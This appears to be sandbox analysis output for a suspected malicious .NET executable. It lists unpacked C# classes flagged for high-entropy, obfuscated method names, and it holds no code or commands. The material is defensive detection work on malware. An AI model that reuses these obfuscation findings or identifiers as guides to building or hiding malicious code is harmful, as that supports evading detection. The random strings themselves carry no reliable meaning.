Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Ulqg1KYWqy9iK6x4JwQ.cs	High entropy of concatenated method names: 'wGl75qg1Kq', 'x7pygRJP53100MinFKZ', 'c5TLGTJaaKdBBCs8UWq', 'nR9e5JJ26nwiBbJANif', 'NSQjT0JBrkfrBl0lVIu', 'VRJCamJzstE0nnUn9yp', 'duAnJ1SroZxwvJu2AqB', 'YPnwbbSyiWO6yZiGDSH', 'RsrRHcSemP8Eo4CgIhv', 'b4jUBxSIYft4LCRh9jc'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, EndRHitDOP423G43614.cs	High entropy of concatenated method names: 'VqaU05tpdT', 'XOsUBrofYl', 'Ge4UFHUhNP', 'IwOUbXb8w0', 'OHhZyaXRsYtX9OZFoVf', 'hrN0vtX0EGJmaNysFsY', 'C3iUp6Xx1Ruxgwr7kXC', 'YlGqY6XZfqbJlyOcblu', 'fs4DpRXLaMb9Ger5VNL', 'SSTbrQXCdbMAaOggwDs'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, LhqPVHi9v7vwu6XZZwi.cs	High entropy of concatenated method names: '_7zt', 'euB4kGPnlG', 'CJM4r7LESg', 'Nys4LA5P2X', 'LCD4ogH5Pp', 'cmZ4x52Qb3', 'sKE4T6kFfK', 'sZWuKbftGLuiwZAX7NS', 'KnkUjufvVak6617x7fP', 'PZEPoFfX96tDcpX3Ttw'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, lKtJRR7wgcb3bJUNIqp.cs	High entropy of concatenated method names: 'BC10d2bQ8JfcjL7mFlZ', 'r2CQPJbHxLCaOw88P4j', 'KrZU7dbIDvYQXQ4MKuc', 'rZ8cnsbdJkFv50EGbJo', 'lhCPtHbswmYl6l4tocJ', 'YHLRPEbq3vi2mlS22HG', 'ENVpakbFjIP96fvx1aS'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, JrCZwsIvjVF3h1G2N1o.cs	High entropy of concatenated method names: 'JRlhlQEfZtL0kfq3ks4', 'VxRbgqEofIJuGUj3EeA', 'Ch1UogEn5lY4JBQIpsU', 'DXvgdtEMtmWMlBH5QWl', 'aX33DLiReU', 'YGScCNElar0CxxrSIKM', 'CrQyq2EwURx5BSylilt', 'iuwtpcEZSXeHXZsVXxo', 'C8nKyEELVGrViEgLSxv', 'u2Ydn7ERQoHkkHS0gpM'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, aPhSNltzEfrayTqNYZY.cs	High entropy of concatenated method names: 'chsHdZcl5k', 'ACSHgmqbKa', 'rYOH5uVaAn', 'kwfmudn6g7RdIJhktPi', 'gdto1Inu2DEw6rJwHwp', 'AgLTYLncHOkDdLrf9wD', 'hJbjAwnpN5831FXdfLT', 'uFfdWhnV332GvWmrcFk', 'rO7ekMnjUy9EByWjTEY', 'qg6RTPnEeyAc98e0JeG'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, apRwVaJ4qyLGtWjkUB.cs	High entropy of concatenated method names: 'x9SWLjbsr', 'i3mQlQr3g', 'NBHRKUg66', 'bemBHuybA9unQyr5IAj', 'VTwnUVyxb0uTCJsxREp', 'Pg1dWhyCY4Wee4lDwe8', 'RyWuZ7ycn2TPxbY532W', 'v4lnJmypR2YLKcaTW86', 'fdQ9dby6TcWlqERGPXr', 'TQoy0SyuCnYfN6XdsQc'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Xbb72oMSLQSvliDvtdr.cs	High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'jgJCBjq1yoRiEOA5JX7', 'PX0kVVqmKB5o4iik8Bq', 'SQJ6lDq54o94TRmogdi', 'AMvD5GqiRb0gLU7bFad', 'QOIMAWqT37kFhf9OJ6x', 'CHaMb1qNaZyCZtnkUrc'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, OHeT0RYc1rGnJTeSPch.cs	High entropy of concatenated method names: 'semISnwYBi', 'zVHM62ki3DH37I64dwx', 'hh46lqkmbk4q7sc6cy8', 'pHxT81k5p3OIqewOYJ9', 'z31oKNkTrc2MF2ETFRM', 'w3ZvDHkNwhPEvqfSS0U', 'xKfI9RMq7l', 'sxwIkAbMdo', 'tkFIryuIva', 'q7IILPZFiw'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, KA6iwBYgdQRABkH6nuj.cs	High entropy of concatenated method names: 'Ep1iNAtaxB', 'TWuicEQOrh', 'eZFizvZebm', 'O4t7KpAtIe', 'Lbu7MFvAIj', 'gIi7YkJj06', 'Oue7tnMHbs', 'vBA7iM0Tc9', 'h1l77n96fS', 'yB6LEI8YGjpFfM2eHbM'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, ixCHqCiGdlf6DeJkUri.cs	High entropy of concatenated method names: 'VMVDNrOLqf', 'UsuDWo1mkK', 'PqhDQA7OZV', 'x73DR56Z8M', 'JxsDlXvPlr', 'OsMDwRJHNp', 'f4wD89e105', 'e5TD6PLiuV', 'h6NDVuCD4X', 's3WD0YMaNA'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, q5NYheMTUbFVpxGMSKh.cs	High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'Fxo4dAq0Adw8yofQZLP', 'wEnuTKqxKh0GPkkM0w7', 'bu5oYBqCnnDvGxbpb2e', 'grEdrwqbZdPblrqhfjy', 'fZxZUiqc9F3VQLG1oNL', 'D3CgmkqpG4qRS416Ubd'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, jujMeQihvXTOctv6lrD.cs	High entropy of concatenated method names: 'qRivnHpqGH', 'DmrvWLchQt', 'jZIvQitNQK', 'HcCvRxy93B', 'tFuvl7jgPZ', 'toBengoAKL24MhG5VP4', 'uVc4KGoSCosQ67leYxW', 'FNJVX9ok3ZJG3ysGtdh', 'WlGKhnoWigoV5LctHXf', 'J6oA2LoXIVTcTaF28dX'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, ubVmFgIR5O6IktitNm.cs	High entropy of concatenated method names: 'MmFvgR5O6', 'i0F86kLKOPVBUNIIeU', 'KjoWBkwOWDAD3R9UcR', 'YlOmseZX47eELRPSmn', 'f4hV1dRy1SKRH7O3i1', 'ecyHwu0B8xJNgvuJLJ', 'Y9eY8xT1I', 'p6atmkswM', 'SsVigxMd9', 'zpv7P1rtR'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, Up9XJDYCHy8FYkARRnc.cs	High entropy of concatenated method names: 'Fk6taMZvLV', 'tDbtnumkRv', 'Yu7tWTcroy', 'X3itQ2RBiW', 'dFItRBEXXm', 'SGFtljBFH5', 'rGstwU7trc', 'vuiqMDKnTNxoNnNU6bL', 'vVMEFoKts2gyHDNebIn', 'UYOeMDKvMZ8LesP0UqO'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, tfbb08OntcbpgMoW42X.cs	High entropy of concatenated method names: 'KAB76SVdnJV06FGD89X', 'k7iTtUVQyyie969f6x3', 'xt1ZCvVeanWvt7Z6g49', 'pBmqRrVIGTUK34vgAs6', 'FmGhWvjRtD', 'WM4', '_499', 'OAphQcJb14', 'pvBhRrkpi9', 'FCyhl1f8oB'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, lyPmma7EmUsrDZdGQja.cs	High entropy of concatenated method names: 'Wl6Si9b6d4', 'MCSS7XBGLM', 'yf7SOPTREI', 'OIgSIlcV6a', 'ukFSURaygh', 'IfMSC0uNLu', 'VsfSHZLRDd', 'aGNSp5RitA', 'rxmSjaZesO', 'wZeS4bY3M3'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, pBItIYtbvG59DjCaF5C.cs	High entropy of concatenated method names: 'oYo', '_1Z5', 'tvsBS5U92f', 'PT8Hi8xNbR', 'uuWB7vIWkO', 'Rna9EyvKjjT9dgLrLXA', 'kbkYuPvDsWU04d3T2VX', 'ymy7cHvUKo32lt7NFXm', 'o79vdNv8qlLEG3DTDaf', 'Rd5Z2HvJe19Slm3Sf1S'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, rsEoR5IpaXfYd7V1ncf.cs	High entropy of concatenated method names: 'sgxI4frrJ7MEM', 'VjtyP5EU1vYd2apoGXP', 'ENJjrJE8YyD0vR8OdBS', 'xf4Hw3EJhfQLDKhDOso', 'IuNmiaESSYRaWLdD0un', 'z6ui5EEk087YUEWHg79', 'G8R1IkEKt0dMj0KpglI', 'XkD9s7EDpTxbN2eGqtS', 'cVQoBFEAbV1uJsGVN6d', 'ripabKEWY2fcOsUc8xk'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, KY69gF7tTVVo0lQ0jib.cs	High entropy of concatenated method names: 'k4XRRPLtg2SWCZ9jkvn', 'WLUpWZLvIuWitiX6bFW', 'jXoADXLXWC45pvyHhOu', 'una680LgOcxlxBxKVxg', 'l1xrqlxGpR', 'NeXBS5Lf4aLReG7JQjX', 'Jo8kjsLoUZyUFLoDIIT', 'RKJVEqLnAi88iOUsMoY', 'W00AwvLM9QqgEWqBFQ4', 'LtP6QdL76OrpPhos0tK'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, ubS7EcQT2nr842VYHD.cs	High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'ydsqMPePd8cc9nN7GDK', 'ag43waeahRNv1TxCfkH', 'rTd886ezEsb7rWUjPWd', 'Gb0JgKIrwKT1krvqHHg', 'hQmMHPIy2yMUTAbUAoR', 'S2MaTdIecBJeTE6XKdC'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, R7TcroM6yN3i2RBiWtF.cs	High entropy of concatenated method names: 'jqJYMGkLIk', 'KDYYYOnV0T', 'YeAYtM7THK', 'FduN8ROTvTmkSigjQAp', 'CIc6lqONqr09oWxBTni', 'LJXCiMO52ay2QBJ2QlH', 'VmjGYdOinPFvolpM77g', 'gQaqRIO35ag46owskBa', 'C04rxxOYjjxGwPpqMU5', 'SiSHFHO2vgTS9rZt3fZ'
Source: 0.3.Vjy8d2EoqK.exe.2a68543.0.raw.unpack, jdJ2xFiqY3A1Z2a7rrs.cs	High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'tfbvKb08tc', '_3il', 'PpgvMMoW42', 'PG3vY7P7mM', '_78N', 'z3K'
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, C8uYurnrp8VZUXX2BRR4Ge.cs	High entropy of concatenated method names: 'mfD3dMb1jo3LDPttIdoAKB', 'CS0XNK30pE9MFyUktxI2Qh', 'We3yutrzGSCJMdwwqAY8RI', 'iZJ0UvH7YnuYKN', '_854ZE54VZ9woIk', 'kDpK7OIWItcxqd', 'Hze68rHbBD2BJt', 'psFGjrFWjoxIvs', 'JNzdBdJygbzSzG', 'nmA6Hww0y1vzeK'
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, QbAVq6ouVDIWQ3nHKWiYDo.cs	High entropy of concatenated method names: '_52uW88aoPu0kLJzYHfUvlg', '_1YWFyku23CzRfwXFMt5pHm', 'LaLm51hbL85HAVtGUhBvGP', '_7MC7U5PfBAk3B4Y3FTJmHT', 'M48WhojlW008HZB3EEdxlE', 'd7f2Il5SkLYQnSKUcG0ZKh', 't3F4jEnbBzMORioYz0Nwjg', 'aQN0ytAtonL4ikNlGMZ6A4', 'WPEPxx6EtOanRnB6T1iv4Y', '_0h9VANIEwHtJqQFfvCgeL5'
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, nmIkMOGEkIfCFCbFNtWXI3.cs	High entropy of concatenated method names: 'tmFPVn6xmlIaGGfyeZFEnP', 'z8l7aoUg6iXUxIWTELSMpK', 'xjAa7DeVVGL0BO3uZEMM53', 'HKAyzlKQEeZ2VLjUaq2lZ0', 'N6UlKAXw1rF3FQZOrjUpip', 'LtIeB8VDLA2lpY0382KKt6', 'GGz2qlHZxZkAYNdft0gMs6', 'X3JWG6Kc8vU5H7IFo8xg0B', 'jpsvWQ1K0BDxatPJm6mGAw', '_2obH9FGKywmi0UuUTs27tT'
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, yIfCXXd4D6C7rdHkuVQpPB.cs	High entropy of concatenated method names: 'sKCAnKkEL8bqEByqQRFfLa', 'YZWA5dtcubyNyNue7yg2fm', 'cyk5qd8ca30pY3fzpRJ6lU', '_6WkjQU9OWT1JFFuNMT3cXQ', 'GnWpiZnfwhzsDszSxnZ2cJ', 'VRiQ53WsUThPvk', 'HVVVbX43whtZqw', 'UtOiZD1WOSJif4', 'mEmTJ8KfoGT8rp', 'ShxeRoKtgGPVax'
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 4ce5B60p7f9hWiWhTpcjgk.cs	High entropy of concatenated method names: 'X5lftDD88JVZ3uB96aGGrI', 'f0VB58UByXEC0S367o1tfz', 'sJsCVtzNVhdYutWv9jWjDO', 'beJae6CGHpIDbLhPnyDUpg', '_9ZhoU66IN3g4Zw', '_4dlEm9xXP4Mz0z', 'qyXWLOAjhXqoI9', 'bWNkQpdHcToRSX', 'nvXtSewd0EnUqt', 'pKygcbh5BprLuk'
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs	High entropy of concatenated method names: 'bBaS2Zf2kWM5G3SzzH45bD', 'tiOwy7RdbMiZ1z023lmQm2', 'Sx95aRMd5IFZfRPr5wEc8a', 'PrpcWtklXnFp9dqOXn57WJ', 'MrwDKqcZXfONGV26SDkiwT', '_2IBtf3HECzCsdZVwp6hI1A', 'RPAzT4xI4YjKP3LrlEy2cx', 'vzPsy0UX5kYhdqyZKKWAKv', 'qb2jP5gfg6DmTwbCJ9bo5C', 'XWAtc3sxFgXYLxznPbkulQ'
Source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, NlOekkeE5O7s901dhU6uz3.cs	High entropy of concatenated method names: 'LqrrwBUlLd3DYZN5hrhPAM', '_9VtGwWLyxijWYE6w9FHHcf', 'enEBPml7mWWx9TXbuu3byh', 'wNKCmFe4u2Hj1wc3kHrJ6a', 'fsoG8es6msbdzuvhAe0NOD', 'IBC6Xwz3OCZT41Z6buGzq5', 'yZoKP69zF6hlW9DcGXEBeb', 'Q2p7sFkP9E6Fb0yW4XiLBD', 'PxaRQKTuuqOGrRXSMFBeUY', 'ffgEUQQThHQ4ePGsvMKN9x'
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, C8uYurnrp8VZUXX2BRR4Ge.cs	High entropy of concatenated method names: 'mfD3dMb1jo3LDPttIdoAKB', 'CS0XNK30pE9MFyUktxI2Qh', 'We3yutrzGSCJMdwwqAY8RI', 'iZJ0UvH7YnuYKN', '_854ZE54VZ9woIk', 'kDpK7OIWItcxqd', 'Hze68rHbBD2BJt', 'psFGjrFWjoxIvs', 'JNzdBdJygbzSzG', 'nmA6Hww0y1vzeK'
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, QbAVq6ouVDIWQ3nHKWiYDo.cs	High entropy of concatenated method names: '_52uW88aoPu0kLJzYHfUvlg', '_1YWFyku23CzRfwXFMt5pHm', 'LaLm51hbL85HAVtGUhBvGP', '_7MC7U5PfBAk3B4Y3FTJmHT', 'M48WhojlW008HZB3EEdxlE', 'd7f2Il5SkLYQnSKUcG0ZKh', 't3F4jEnbBzMORioYz0Nwjg', 'aQN0ytAtonL4ikNlGMZ6A4', 'WPEPxx6EtOanRnB6T1iv4Y', '_0h9VANIEwHtJqQFfvCgeL5'
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, nmIkMOGEkIfCFCbFNtWXI3.cs	High entropy of concatenated method names: 'tmFPVn6xmlIaGGfyeZFEnP', 'z8l7aoUg6iXUxIWTELSMpK', 'xjAa7DeVVGL0BO3uZEMM53', 'HKAyzlKQEeZ2VLjUaq2lZ0', 'N6UlKAXw1rF3FQZOrjUpip', 'LtIeB8VDLA2lpY0382KKt6', 'GGz2qlHZxZkAYNdft0gMs6', 'X3JWG6Kc8vU5H7IFo8xg0B', 'jpsvWQ1K0BDxatPJm6mGAw', '_2obH9FGKywmi0UuUTs27tT'
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, yIfCXXd4D6C7rdHkuVQpPB.cs	High entropy of concatenated method names: 'sKCAnKkEL8bqEByqQRFfLa', 'YZWA5dtcubyNyNue7yg2fm', 'cyk5qd8ca30pY3fzpRJ6lU', '_6WkjQU9OWT1JFFuNMT3cXQ', 'GnWpiZnfwhzsDszSxnZ2cJ', 'VRiQ53WsUThPvk', 'HVVVbX43whtZqw', 'UtOiZD1WOSJif4', 'mEmTJ8KfoGT8rp', 'ShxeRoKtgGPVax'
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 4ce5B60p7f9hWiWhTpcjgk.cs	High entropy of concatenated method names: 'X5lftDD88JVZ3uB96aGGrI', 'f0VB58UByXEC0S367o1tfz', 'sJsCVtzNVhdYutWv9jWjDO', 'beJae6CGHpIDbLhPnyDUpg', '_9ZhoU66IN3g4Zw', '_4dlEm9xXP4Mz0z', 'qyXWLOAjhXqoI9', 'bWNkQpdHcToRSX', 'nvXtSewd0EnUqt', 'pKygcbh5BprLuk'
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, 64FvXJFd4Y5hWOslH6zBKZ.cs	High entropy of concatenated method names: 'bBaS2Zf2kWM5G3SzzH45bD', 'tiOwy7RdbMiZ1z023lmQm2', 'Sx95aRMd5IFZfRPr5wEc8a', 'PrpcWtklXnFp9dqOXn57WJ', 'MrwDKqcZXfONGV26SDkiwT', '_2IBtf3HECzCsdZVwp6hI1A', 'RPAzT4xI4YjKP3LrlEy2cx', 'vzPsy0UX5kYhdqyZKKWAKv', 'qb2jP5gfg6DmTwbCJ9bo5C', 'XWAtc3sxFgXYLxznPbkulQ'
Source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, NlOekkeE5O7s901dhU6uz3.cs	High entropy of concatenated method names: 'LqrrwBUlLd3DYZN5hrhPAM', '_9VtGwWLyxijWYE6w9FHHcf', 'enEBPml7mWWx9TXbuu3byh', 'wNKCmFe4u2Hj1wc3kHrJ6a', 'fsoG8es6msbdzuvhAe0NOD', 'IBC6Xwz3OCZT41Z6buGzq5', 'yZoKP69zF6hlW9DcGXEBeb', 'Q2p7sFkP9E6Fb0yW4XiLBD', 'PxaRQKTuuqOGrRXSMFBeUY', 'ffgEUQQThHQ4ePGsvMKN9x'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, JV0vfytHnkICvCjUiWq.cs	High entropy of concatenated method names: 'iFWUnNTmBd', 'WxeUWBksXN', 'ojgUQF3XDb', 'RanV0vXDHGRrq0jLTdA', 'JTr6JdXhbQlyYimSYAo', 'Kx6AbEXKBWOXQ7MXlnI', 'EujorgXUjCMPvYrSmhe', 'KiLUAGxrgd', 'dB8Ue2gjLp', 'nqwUfESXJk'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, t5BmhM71RBVutNWcVVM.cs	High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, vmUoogMoZ7t63nhJ2fA.cs	High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'oYI48Fqn1AkaVIYuG1m', 'idjhejqMKboHpoubPJp', 'xTZ9NwqfM0sune0tTDs', 'gGFvatqoJjeykC2nRpq', 'MqqSMeq71V5Pam8Sl9W', 'fGeUk0q4dZmdZb9QEQ7'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, GHDOQSOKt60AmXixKaY.cs	High entropy of concatenated method names: 'HKISFgTYJM', 'KjSSblskpP', 'FhiSX9mp8U', 'YHPSulBGGi', 'WqHS2ZCmYX', 'ppHSPY4VhT', '_838', 'vVb', 'g24', '_9oL'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, oAixKhMgi1NyrkQL9eb.cs	High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'apnd3KFxC0ib8CxMJlj', 'rRXTjsFCPEQkYEPoMAT', 'Inl3tBFbRqQq5IcOiSD', 'k8XCBEFciXd5oe3tMk7', 'tMMiguFpsRyLUbGCfLf', 'm9NgJRF6svPh8o6Vglc'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, TGn25mMBn6ddL6qT9pa.cs	High entropy of concatenated method names: '_2WU', 'YZ8', '_743', 'G9C', 'BPcx57GHYBWsX1XdBlQ', 'RGJwLhGsujYQktn6MB8', 'bybZmoGqe8ORibCuya3', 'zd6A5jGFijHxm5I5kJr', 'oAYpImGdNSv9tapAUU5', 'svwpFUGQl3D2rXn7xbO'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, yYprVsY8wfpeqvUvLdV.cs	High entropy of concatenated method names: 'UlFOUULXpo', 'c5AOCbcvYa', 'WCZQsqSY7FnIkp3cq0k', 'WpGwGVS2XEl5YwW8gmA', 'PAfH4MSNmsYCiwGrcW4', 'IVkXO6S3ReRXb6UjHgI', 'ieTOf0R1rG', 'Be17iwkrs8oL4thcFDU', 'LAwKSRkyY1agqf0Ih6B', 'cQ1M6ySaTHNmZV871Wx'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, uP2t2kBiaYKpOZqHv2.cs	High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'YFnsRVdSlDpb5eZTVO9', 'Y6W9QTdkMln5Mx6BiPp', 'jZPms7dAL1Jj5l0Tkt6', 'SeAqvOdWETD1rMQoI74', 'KNFTbjdXSo2ohl0kyOv', 'UAnw40dg3yQNvW5M31d'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, vQ5JZIGo3TYjJWFHUt.cs	High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'GLFZvTQ7iiQKxZH4air', 'dbSnLfQ4UGOIPDLMASP', 'Xwd5B5QlTby67F6XpEE', 'jJc87bQwr9o7olRkRLk', 'vpvPmoQZRYwTkvkqk5j', 'ztIImSQLVcswcD1mBKU'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, XFvZebYrmb4tpAtIe6b.cs	High entropy of concatenated method names: 'FlIivjPLEi', 'RHCiDyPdtv', 'cB0y6XUn4rQ0LCYVQNl', 'yXURuYUMFEqWh4KEpjX', 'rac6WOUtoZdeYlr8D6f', 'jmRHXBUvZgtFYFCWJk2', 'Ibu4tmUfa7EEiTZOQjd', 'J7G3DWUoIhdGnDBXT0C', 'kY1FcKU7fQHlU7s01cY', 'Fu8UI2U4dR3J3wRlpq3'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, xMCSNetqeYm9kSYvTZy.cs	High entropy of concatenated method names: 'jGDCa7uv8P', 'f9oCnnJcSq', 'xyCUDKtkZ1bTIDISVko', 'hxX55PtAQpAxupZJDOC', 'VepZQEtJEf5ZmgKljRq', 'dj3JKwtSKoIkoueTCl3', 'TwFKkjtW5ANY55dNWFQ', 'VhMr0QtXMxuvcXAkW8Y'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, hluG387c2TQXKLfFIi5.cs	High entropy of concatenated method names: 'xncSdchc35', 'Wv4SgmjsWg', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'paES5JOGJN', '_5f9', 'A6Y'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, lCQ1k2MuDYFt4bD2Mgy.cs	High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'U92r22GXT4ASrWuSdim', 'uV3VSGGg876qwqbxEC2', 'BNsGgYGtcP4pd2FaxDM', 'mk597YGvKvbkiVkU67c', 'pB3fxWGnTrZ3co24OFp', 'jtQEjdGMD9fl2bS5OiF'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, HdMPAIYlghUAXdOGxdo.cs	High entropy of concatenated method names: '_0023Nn', 'Dispose', 'ryD7WXWLKK', 'iFo7QWQdMP', 'oIg7RhUAXd', 'fGx7ldoqUH', 'LPF7wPQnk0', 'iJbLDpSFG9LCEH55Kq1', 'w1CtNqSOI03vewwmMu4', 'HPytOUSswM1o7t4Jwo5'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, ReNpgNOOA8EeOiEY4Ra.cs	High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, WWoKZddyLRPo3RO1co.cs	High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'GM8S4DeG5SQGInOffEo', 'zs2ES4e9S9falIQkNHh', 'GqP92Yehv1GsdZ35fT9', 'IfDxVheKTjLsLjK2fZp', 'g5dt9feDHC8v7TjOEa2', 'zpcrFEeUlVDi94De0yY'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, mtgj6SMmZrhn9Txbl5Q.cs	High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'XusEDKqr6IDw5QCWFLw', 'yfLDS3qybeqAm5ppxxR', 'K03RpFqeARtCd8Wqo6U', 'P7FdZUqIjabVYQe8jFu', 'qfRJKGqdktvRWTdM9DD', 'atfdYTqQ4Nrb06qW7t0'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, EYr9r3ty9eqCxR6EynV.cs	High entropy of concatenated method names: 'IQDe6dnCGvm0veLHhp0', 'tOPpc4nbY6dnQAOdJ8E', 'A6uj3Wn0baV6Mvy2Nof', 'DnLF64nxugP8OquqONE', 'IWF', 'j72', 'XmBHf7apKZ', 'Ik9HmGvNg3', 'j4z', 'D5dH9eJoyo'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, IawrD3OYOmJuHWNhaid.cs	High entropy of concatenated method names: 'TCVJUPiAOi', 'MZ4JCvLjMo', '_8r1', 'trWJHqF0dx', 'ALfJpLQUtt', 'WaQJjtw0aM', 'fw0J4fPRh4', 'N7FsF3p8vxRc3XZSju9', 'dfCBXwpJDtb8uUBHDeh', 'D8LCknpSPiRJqqDD33h'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, Dw8AKEORyFmKNrU2tn9.cs	High entropy of concatenated method names: 'QrOgl4LGEl', 'ge1d8nVlQeHQacOwhyT', 'Ac6jf9Vw7SLjcQPFEDs', 'HoQOr8V7Vyd5nmUSKO8', 'F3FxCWV4BQ1og3oC6We', '_1fi', 'GfhdP7BMQ7', '_676', 'IG9', 'mdP'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, fY9NWHMP090I2AhMOeE.cs	High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'G6VYKXGZCe1QOheyJxY', 'jp6DjhGLecwcf0L5KLK', 'G2DniHGRK4MBxY3f0Hj', 'LZWAxbG0eIuJwoeHsq8', 'JKHUoNGxK7Ct9r2Sjnq', 'Q6nu6VGCHZwVGS82dsn'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, ldXXePO2cX0NgwpiRWG.cs	High entropy of concatenated method names: 'KTT5xV92Xh', '_1kO', '_9v4', '_294', 'DDj5T8D4wH', 'euj', 'jOU5qaiOc6', 'CJ85SB82SL', 'o87', 'fct5Jrjc7P'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, gPab3a8MAqVPB57oG2.cs	High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'TS8mNoI2GLiqiwJ1jkH', 'b890AJIBCY1t7DQSIYr', 'CS1ubGIPVXxTxbPXRGL', 'AnOLhlIaN0xZG4rJudx', 'JwEc1UIzg1oDkQXfdes', 'rYlI34drMTwBy1PpVSa'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, qK3JQBtPrVq6NPMPItr.cs	High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'PnHHpylGTU', 'Nw9BvowB16', 'JVsHjtbJZW', 'kGuBusUMXS', 'VAgVWZvbrbttqYpDNXS', 'TcSPanvcx24Q8RNvZ0t', 'JKWuFivxH4yjU2jMRjt'
Source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, H98NOxMebTsjS0ADbOs.cs	High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'VyJXM8sNdLmbLMlPG7Q', 'DWtCZrs32jhqZmfBkBZ', 'qkR5nfsYDdypEJLANm6', 'GEfpLrs2DFPqbrgrQ5S', 'hQ5uwdsByIoRb6s1Gar', 'bT8QYgsPMkVHNK1Je0X'
